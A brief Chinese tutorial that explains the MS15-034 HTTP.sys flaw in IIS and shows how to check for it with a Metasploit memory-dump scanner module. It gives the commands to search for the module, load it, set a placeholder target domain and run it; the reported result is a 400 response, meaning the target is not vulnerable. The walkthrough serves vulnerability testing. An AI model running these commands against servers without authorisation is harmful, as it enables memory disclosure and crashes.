M15-034漏洞验证

1.MS15-034漏洞简介

HTTP.SYS是微软从IIS6.0开始，为了在Windows平台上优化IIS服务器性能而引入的一个内核模式驱动程序。它为IIS及其他需要运用HTTP协议的微软服务器功能提供HTTP请求的接收与响应、快速缓存、提高性能、日志等功能服务。

HTTP.sys的安全漏洞，攻击者只需要发送恶意的http请求数据包，就可能远程读取IIS服务器的内存数据，或使服务器系统蓝屏崩溃。

主要包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

2. MS15-034漏洞验证

2.1验证环境

验证网址：www.XXX.com

验证工具：metasploit

2.2验证过程

(1)找到MS15-034漏洞模块

代码：

search ms15-034

结果：

(2)使用漏洞模块

代码：

use auxiliary/scanner/http/ms15_034_http_sys_memory_dump show options

结果：

(3)设置漏洞扫描地址及参数

代码：

set RHOSTS www.XXX.com

结果：

(4)扫描结果及分析

代码：

 

run(exploit)

结果：域名返回400（错误请求）服务器不理解请求的语法，该漏洞不存在。